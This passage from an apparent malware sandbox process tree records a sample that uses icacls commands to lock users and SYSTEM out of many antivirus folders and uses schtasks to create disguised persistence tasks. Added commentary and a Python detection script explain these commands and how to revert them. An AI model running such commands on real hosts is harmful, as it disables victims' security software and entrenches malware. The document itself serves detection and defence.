[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3596)
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 2132)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 4220)
    icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1192)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5892)
    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3828)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 4256)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3212)
    icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 6052)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5852)
    icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 452)
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 8)
    icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5408)
    C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 1820)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3792)
    icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1724)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2528)
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 208)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3840)
    icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5648)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 1196)
    icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4540)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5132)
    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4948)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2980)
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 5976)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 352)
    icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 452)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5408)
    icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1092)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5124)
    icacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1196)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 4884)
    icacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4472)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3268)
    icacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 2108)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2984)
    icacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 452)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3408)
    icacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3332)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3776)
    icacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 2968)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 3620)
    icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 4492)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5840)
    icacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 3156)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5388)
    icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1244)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\System32\Conhost.exe (PID 3620)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5880)
    icacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 1524)
    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 2184)
    icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\cmd.exe (PID 2816)
    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)
[depth 4] C:\Windows\SysWOW64\icacls.exe (PID 5900)
    icacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)
    - Modifies file permissions
[depth 3] C:\Windows\SysWOW64\schtasks.exe (PID 3076)
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 1
    - Creates scheduled task(s)
[depth 4] C:\Windows\System32\Conhost.exe (PID 1244)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
[depth 3] C:\Windows\SysWOW64\schtasks.exe (PID 1048)
    "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
    - Creates scheduled task(s)
[depth 4] C:\Windows\System32\Conhost.exe (PID 4132)
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
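The netsh, icacls and schtasks entries above form one defence-evasion and persistence sequence. Each icacls call places a full-control deny ACE (`(OI)(CI)(F)`, inherited by files and subfolders; the Malwarebytes and MB3Install entries use a bare `(F)` on the folder itself) first for the current user and then for SYSTEM, which blocks both interactive clean-up and the product's own services. The cmd.exe parent record keeps the literal `%username%` while the icacls child shows the expanded `Admin`, so a detection that only reads one of the two will miss half the evidence. The targets mix security-product directories with look-alike paths that no legitimate installation uses: there is no svchost.exe directly under C:\Windows (the real one is in System32 and SysWOW64), and the genuine .NET native-image folder is v4.0.30319, not v4.0.30318 under ProgramData. The two scheduled tasks hide under the Microsoft\Windows task folder and run binaries named taskhostw.exe and winlogon.exe from ProgramData, every minute and at logon with highest privileges respectively.

The Python script below is an added example, not part of the sandbox report or of the sample itself. It scans process-creation command lines (here a constructed list modelled on the entries above, standing in for the CommandLine field of Sysmon Event ID 1 or Security Event ID 4688 records) and for each hit returns the ATT&CK technique, the reason, and the command that reverts the change. The vendor-directory list, the severity scheme and the `analyze`/`scan` names are this example's own choices.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample command lines modelled on the cmd.exe / icacls / netsh / schtasks
# entries in the tree above; in practice these are the CommandLine fields of Sysmon
# Event ID 1 or Security Event ID 4688 records.
SAMPLE_COMMANDLINES = [
    'C:\\Windows\\system32\\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out',
    'icacls "C:\\Program Files\\Malwarebytes" /deny Admin:(OI)(CI)(F)',
    'icacls "C:\\Program Files\\Kaspersky Lab" /deny system:(OI)(CI)(F)',
    'icacls "C:\\Windows\\svchost.exe" /deny Admin:(OI)(CI)(F)',
    '"C:\\Windows\\SysWOW64\\schtasks.exe" /create /TN "Microsoft\\Windows\\Wininet\\Cleaner" /TR "C:\\Programdata\\WindowsTask\\winlogon.exe" /SC ONLOGON /RL HIGHEST',
    'icacls C:\\Users\\Admin\\Documents\\share /grant Everyone:(OI)(CI)(R)',  # benign control
    'netsh advfirewall firewall show rule name=all',  # benign control
]
# Directory names of security products that appear as icacls /deny targets above.
SECURITY_DIR_NAMES = {
    "malwarebytes", "mb3install", "adwcleaner", "bytefence", "kvrt_data", "360", "360safe",
    "spyhunter", "enigma software group", "comodo", "avast software", "avg", "norton",
    "kaspersky lab", "kaspersky lab setup files", "doctor web", "grizzly", "grizzly antivirus",
    "cezurity", "mcafee", "avira", "eset", "panda security",
}
# Windows binaries that only legitimately live under System32 / SysWOW64.
SYSTEM_BINARY_NAMES = {"svchost.exe", "taskhostw.exe", "winlogon.exe", "csrss.exe", "lsass.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
BUILTIN_PRINCIPALS = {"system", "administrators", "everyone", "users", "%username%"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')  # a quoted path or a bare word

def tokenize(cmdline):
    # Split on whitespace but keep quoted paths ("C:\Program Files\...") as one token.
    return [t.strip('"') for t in TOKEN_RE.findall(cmdline)]

def _unwrap_cmd(tokens):
    # The parent record shows 'cmd.exe /c <inner>'; analyse the inner command.
    if len(tokens) > 2 and tokens[0].lower().endswith("cmd.exe") and tokens[1].lower() == "/c":
        return tokens[2:]
    return tokens

def _after(tokens, flag):
    # Value following /deny, /TN, /TR ... (flags are case-insensitive on Windows).
    low = [t.lower() for t in tokens]
    i = low.index(flag) + 1 if flag in low else len(tokens)
    return tokens[i] if i < len(tokens) else None

def _kv(tokens, key):
    # Value of a netsh key=value argument, without surrounding quotes.
    return next((t.split("=", 1)[1].strip('"') for t in tokens if t.lower().startswith(key + "=")), None)

def _name(path):
    return PureWindowsPath(path).name.lower()

def analyze(cmdline):
    """Return a finding dict (technique, severity, detail, revert) or None."""
    tokens = _unwrap_cmd(tokenize(cmdline))
    exe, low = (_name(tokens[0]) if tokens else ""), [t.lower() for t in tokens]
    if exe in ("icacls", "icacls.exe") and "/deny" in low and len(tokens) > 1:
        target, principal = tokens[1], (_after(tokens, "/deny") or "").partition(":")[0]
        reasons = []
        if principal.lower() in BUILTIN_PRINCIPALS:
            reasons.append(f"deny ACE for built-in principal {principal}")
        if _name(target) in SECURITY_DIR_NAMES:
            reasons.append(f"target is a security-product directory: {target}")
        if _name(target) in SYSTEM_BINARY_NAMES and not target.lower().startswith(SYSTEM_DIRS):
            reasons.append(f"system binary name outside System32: {target}")
        return {"technique": "T1222.001", "severity": "high" if reasons else "medium",
                "detail": "; ".join(reasons) or f"icacls /deny {principal} on {target}",
                "revert": f'icacls "{target}" /remove:d {principal}'}
    if (exe in ("netsh", "netsh.exe") and low[1:5] == ["advfirewall", "firewall", "add", "rule"]
            and (_kv(tokens, "action") or "").lower() == "allow"):
        name = _kv(tokens, "name")
        return {"technique": "T1562.004", "severity": "medium",
                "detail": f"firewall allow rule {name}: {_kv(tokens, 'dir')} {_kv(tokens, 'protocol')}/{_kv(tokens, 'localport')}",
                "revert": f'netsh advfirewall firewall delete rule name="{name}"'}
    if exe in ("schtasks", "schtasks.exe") and "/create" in low:
        tn, tr = _after(tokens, "/tn") or "", _after(tokens, "/tr") or ""
        reasons = []
        if tr.lower().startswith(("c:\\programdata\\", "c:\\users\\")):
            reasons.append(f"task runs from a user-writable path: {tr}")
        if _name(tr) in SYSTEM_BINARY_NAMES and not tr.lower().startswith(SYSTEM_DIRS):
            reasons.append(f"task binary masquerades as {_name(tr)} (T1036.005)")
        if tn.lower().startswith("microsoft\\windows\\"):
            reasons.append(f"task name hides under the Microsoft\\Windows folder: {tn}")
        if reasons:
            return {"technique": "T1053.005", "severity": "high", "detail": "; ".join(reasons),
                    "revert": f'schtasks /delete /TN "{tn}" /F'}
    return None

def scan(cmdlines):
    # A cmd.exe wrapper and its child produce the same revert command: report it once.
    findings, seen = [], set()
    for line in cmdlines:
        f = analyze(line)
        if f and f["revert"] not in seen:
            seen.add(f["revert"])
            findings.append(dict(f, cmdline=line))
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_COMMANDLINES):
        print(f"{f['technique']} {f['severity']:6} {f['detail']}\n    revert: {f['revert']}")
```

The revert commands are meant for an elevated prompt on the affected host: `icacls /remove:d` strips only the deny ACEs for the named principal and leaves the original grants in place, `netsh advfirewall firewall delete rule name=...` removes every rule with that name, and `schtasks /delete /F` removes the task but not the binary it pointed at, which still has to be collected and deleted. Deduplication keys on the revert string, so the netsh and schtasks wrapper/child pairs collapse to one finding, whereas the icacls pairs are reported twice because the parent carries `%username%` and the child the expanded name.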
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 7108)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=2320 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6592)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5908 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1896)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=844 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6480)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6504)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3088 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 5364)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5160 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6584)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 2924)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=3260 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 1512)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6384)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=4720 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 3312)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=3312 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 6992)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4980 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4476)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6024 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:8
[depth 2] C:\Program Files\Google\Chrome\Application\chrome.exe (PID 4252)
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --mojo-platform-channel-handle=4464 --field-trial-handle=1968,i,16899071591026127518,17185730872065838082,131072 /prefetch:1
[depth 1] C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe (PID 1312)
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
[depth 1] C:\Windows\system32\AUDIODG.EXE (PID 2372)
    C:\Windows\system32\AUDIODG.EXE 0x424 0x500
[depth 1] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 2288)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
    - Executes dropped EXE
[depth 2] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 4688)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Checks processor information in registry
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 5888)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.0.502385613\1521958810" -parentBuildID 20240510150000 -prefsHandle 1700 -prefMapHandle 1692 -prefsLen 21731 -prefMapSize 245600 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {3f36d919-ab89-4833-8649-fa0a1fda42ea} 4688 gpu
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe (PID 180)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:679fbcdb86730ad560bc244da36cfbc3cccc619ec89727a9ca4e3e4f83 +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 4688 DisableNetwork 1
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 5808)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.1.35228174\2007884123" -childID 1 -isForBrowser -prefsHandle 2908 -prefMapHandle 2392 -prefsLen 22168 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {9510dc7a-982e-4b63-ab38-fce295cbd864} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 5584)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.2.1530161683\50141753" -childID 2 -isForBrowser -prefsHandle 3224 -prefMapHandle 3220 -prefsLen 22298 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {88331b3e-122c-4485-836b-847358eaa80a} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 5356)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.3.1032027761\1884162250" -childID 3 -isForBrowser -prefsHandle 3752 -prefMapHandle 3684 -prefsLen 21126 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7156dcbd-2bbf-464f-b51c-c659798ed050} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 5332)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.4.339384661\1054425105" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3912 -prefsLen 21126 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2644a4b1-029b-47c5-b2d1-32f48af81970} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 2056)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.5.1807471972\242689189" -childID 5 -isForBrowser -prefsHandle 4084 -prefMapHandle 4088 -prefsLen 21126 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {24b6c26a-4870-4661-8b5f-f38a2c26d22d} 4688 tab
    - Checks computer location settings
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 2968)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.6.1820739933\2091338224" -childID 6 -isForBrowser -prefsHandle 4432 -prefMapHandle 4424 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {e423cd8d-fd31-4793-90e1-c08956fee3a4} 4688 tab
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 856)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.7.121320416\1135899275" -childID 7 -isForBrowser -prefsHandle 3788 -prefMapHandle 3644 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7cd91538-7c64-4053-8cbe-7de5667fc766} 4688 tab
    - Checks computer location settings
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 2124)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.8.640210574\766935325" -childID 8 -isForBrowser -prefsHandle 3656 -prefMapHandle 4812 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {12a44815-b9d5-4129-8fe5-258a828ff557} 4688 tab
    - Checks computer location settings
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 2716)
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel="4688.9.1516444663\101273698" -childID 9 -isForBrowser -prefsHandle 4288 -prefMapHandle 4076 -prefsLen 21274 -prefMapSize 245600 -jsInitHandle 1296 -jsInitLen 240916 -parentBuildID 20240510150000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {a51fd3c3-385b-4734-bb13-c0c7afa55147} 4688 tab
    - Checks computer location settings
    - Executes dropped EXE
[depth 3] C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe (PID 5896)
